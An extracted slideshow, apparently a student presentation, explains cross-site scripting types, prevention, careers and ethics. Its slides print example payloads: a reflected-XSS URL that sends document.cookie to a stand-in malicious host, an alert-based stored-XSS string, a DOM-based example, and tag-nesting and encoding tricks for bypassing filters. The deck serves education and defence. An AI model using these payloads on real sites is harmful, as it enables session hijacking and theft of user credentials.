Upload
daniel-tumser
View
100
Download
2
Embed Size (px)
Citation preview
Table of Contents● Introduction● Related Works● Technical Aspects● Types of XSS
o Reflected XSSo Stored XSSo DOM-Based XSSo Prevention
● Careers and Jobs● Social Impact● Ethical Impact● Future Expectations● Conclusion● References
Introduction● Cross-Site Scripting (XSS) occurs when an attacker
uses a web application to gather data from a user
● Attackers inject JavaScript into an application to fool a user to get data from them
● Every month roughly 10-25 XSS holes are found in commercial products and advisories are published explaining the threat.
Related Works● 1995 - Netscape releases JavaScript● 1999 - David Ross (Microsoft) publishes “Script
Injection” paper● 2000 - Microsoft works with CERT● 2005 - Samy Kamkar attacks MySpace● 2006 - Cross-Site Scripting Malware popular
o port scanners, keyloggers, etc● 2007 - XSS #1 on the Open Web Application Security
Project (OWASP) Top Ten list● 2010 - XSS #2 on OWASP Top Ten list● 2013 - XSS #3 on OWASP Top Ten list
Technical Aspects● Leverages JavaScript to attack the user
o JS is a client-side processed scripting language
● General aim of the attack is Session Hijacking or Credentials Stealingo ex. Steal user cookie & use web app
as them● Can compromise the entire application
through users
Reflected XSS● Most common form of XSS vulnerability (roughly 75% of cases)● Vulnerability
o Improper filtering/sanitization of HTTP parameters or user input that are processed by server-side scripts and reflected in the HTML the client receives
● Exploito Crafted input by malicious user is added to a URL and sent to target
usero http://www.something.com/thing.cgi?param=<script>document.location=“http://
www.maliciousSite.com/?”+document.cookie;</script>
● Problemo Relies on target user having active session to hijack
Stored XSS● Attack stored in application servers● Vulnerability
o Improper user input sanitization in forms and user-created content instead of HTTP request params
● Exploito Malicious script is injected into the page content viewed by other users
ex. MySpace content (by Samy), Ebay sale listing (by Shubham Upadhyay) '"--></style></script><script>alert("XSSed by Cyb3R_Shubh4M")</script>
● Why it’s more dangerouso Other users will already have an active session with the application in order for malicious
code to be processed on their browser
DOM-Based XSS● All client-side processing, no server processing● Vulnerability
o Improper JS data handling.● Exploit
o Leverages Document Object Model, pulling data with AJAX, and client-side processing
● Exampleo Next slide from Open Web Application Security Project (OWASP)
DOM-Based XSS Example● Expected URL in HTTP request, parameter decides default language to
displayo http://www.some.site/page.html?default=French
● Malicious URLo http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
● Script in HTTP response from servero document.write("<OPTION value=1>"+document.location.href.substring
(document.location.href.indexOf("default=")+8)+"</OPTION>");
o All processing references made to the Location object in the Document object for the web page in the browser (document.location)
o Specifically to the value sent as the “default=” parameter
DOM-Based XSS Example Cont.● Browser processes the script received by the server which● injects the malicious URL parameter script into the DOM when rendering
the page, which● executes the malicious script
Preventing XSS● Recursive sanitization
o When processing a client HTTP request or user supplied data it must be sanitizedo Why recursive?
Wrapping commonly sanitized characters or sub-strings ex. <scr<script>ipt> . . . </scr</script>ipt> becomes… <script> . . . </script>
● Properly handle Encoding/Decodingo URL Encoding / Percent Encoding
One method attackers used to bypass literal character filtering is to encode known untrusted/dangerous characters (ex. %3C = ‘<’)
o HTML Encoding / Decoding Another method for bypassing these filters is to HTML encode those characters
injected into the document to be decoded back into scripts when the page is rendered
Careers and Jobs
Job Growth Projection (2012-2022)● Jobs in 2012 /
2022o 141,400 /
169,900● 10-year Growth
o +20% /+28,500
Web Developer Pay (2012)● Median wage (Web Devs.)
o $62,500● vs Median wage (all
occupations)o x1.8
Web Developer
Careers and Jobs
Skills● HTML● JavaScript● PHP● C#● jQuery● CSS
Web Developer
● Java● SQL● Ruby on Rails● .NET● ASP.NET● MySQL
Careers and Jobs
Skills● Web Security and
Encryption● Network Security
management
Penetration Tester
● Security Testing and Auditing
● Computer Security
Careers and Jobs
Minimum Qualifications● Bachelor's degree and 3 years of
professional work experience (or a master's degree)
Additional Qualifications● Experience in
o developing web applications in Java, Ruby or JavaScript
o OWASP or NIST 800-64o application security assessment toolso IT Security user groups or security
certification (CISSP, CEH, OSCP, etc.)(MathWorks job listing)
Web Application Security Engineer
Careers and Jobs
Firefox Platform EngineerMinimum Qualifications
● Experienceo writing code. College degree is not
necessary or sufficient.o Expertise in any of C++, JavaScript, or
Python.o Experience debugging or profiling.
Desired Skills● C++; JavaScript; x86, x86_64, or ARM● Experience with cryptographic signing and
verification.● Experience with security threat models.● and more
Platform/Browser Engineer & Security Engineer
Platform Security EngineerMinimum Qualifications
● BS in Computer Science (or equivalent) plus 3-5 years industry experience
● Strong knowledge of C++ and JavaScript● Strong privacy or security background● Experience working in security or development
team● Experience in contributing to large open source
projects is a plus● Excellent verbal and written communication skills
Social Impact
● Link mistrust?o Users still lax and ignoranto Hackers/hacking still a very
opaque subject to most● Train users?
o Organizations already doo They get the training wrongo Users are still making dumb
mistakes (ex. Only hover over a
link to check if the domain matches)
Ethical Impact
Don’t do it(without permission)
It’s unethical and very illegal. Unless you like fines, 5-20 years in prison (Title 18 U.S. Code § 1030(C)) and civil litigation.
Offensive/Malicious Perspective
Ethical Impact
● Developers have an ethical and sometimes legal responsibility to their clients.o XSS can result in the compromise of the entire application in addition
to client accountso Client compromise can disclose PII, and App compromise can mean
total data breach and network compromise● Data breach disclosure is required by law in every state but New Mexico,
Alabama and South Dakotao Very damaging for a company financially and to client trust
relationships
Defensive/Developer Perspective
Secure your code!
Future Expectations
● One estimate is that 94% of web applications are vulnerable to XSSo Every month roughly 10-25 XSS holes are found in
commercial products● Jobs
o the bureau of labor statistics expects a 37% increase for InfoSec professionals 2012-2022
● Prevention by consumer education is key!
Conclusion
● Almost all web applications are vulnerable to XSS● XSS has been on OWASP’s Top Ten list for 8 years● Repercussions to XSS?
o possible to probable jail-time and fines● Preventing XSS?
o biggest burden lies in consumer/user education● Jobs?
o expecting increase of 37% (2012-2022) all computer systems need security
References1. Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook Finding and Exploiting Security Flaws. 2nd ed. Indianapolis: Wiley,
2011. Print.2. "The Cross-Site Scripting (XSS) FAQ." 'Web and Application Security News' Web. 17 June 2015. http://www.cgisecurity.com/xss-faq.html. 3. "XSS (Cross Site Scripting) Prevention Cheat Sheet." - OWASP. Web. 17 June 2015.
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet. 4. "A Short History of JavaScript." - Web Education Community Group. Web. 17 June 2015.
https://www.w3.org/community/webed/wiki/A_Short_History_of_JavaScript.5. "History of Cross Site Scripting." Increased Visibility. Web. 17 June 2015. http://intellavis.com/blog/?p=284.6. "Types of Cross-Site Scripting." - OWASP. Web. 17 June 2015. https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting.7. "Securing Your Web Browser." Securing Your Web Browser. CERT. Web. 17 June 2015. https://www.us-cert.gov/publications/securing-your-web-
browser.8. Saxena, Prateek. "Systematic Techniques for Finding and Preventing Script Injection Vulnerabilities." Electrical Engineering and Computer Sciences
University of California at Berkeley, 29 June 2012. Web. 17 June 2015. http://www.eecs.berkeley.edu/Pubs/TechRpts/2012/EECS-2012-170.pdf.9. Klein, Amit. "Cross Site Scripting Explained." Sanctum Security Group, 1 June 2002. Web. 17 June 2015.
https://crypto.stanford.edu/cs155/papers/CSS.pdf.10. "Web Application Security Engineer." - MathWorks Jobs. MathWorks. Web. 17 June 2015.
http://www.mathworks.com/company/jobs/opportunities/web-application-security-engineer-14497?source=10192.11. "Web Application Security Engineer Salary." Web Application Security Engineer Salary. Indeed. Web. 17 June 2015. http://www.indeed.com/salary?
q1=Web Application Security Engineer&l1=.12. "Web Application Developer Salary (United States)." Web Application Developer Salary (United States). PayScale. Web. 17 June 2015.
http://www.payscale.com/research/US/Job=Web_Application_Developer/Salary.13. "Web Developers." U.S. Bureau of Labor Statistics. U.S. Bureau of Labor Statistics, 8 Jan. 2014. Web. 17 June
2015.http://www.bls.gov/ooh/computer-and-information-technology/web-developers.htm.14. "Penetration Tester Salary (United States)." Penetration Tester Salary (United States). PayScale. Web. 17 June 2015.
http://www.payscale.com/research/US/Job=Penetration_Tester/Salary.15. "18 U.S. Code § 1030 - Fraud and Related Activity in Connection with Computers." 18 U.S. Code § 1030. Cornell University. Web. 17 June 2015.
<https://www.law.cornell.edu/uscode/text/18/1030>.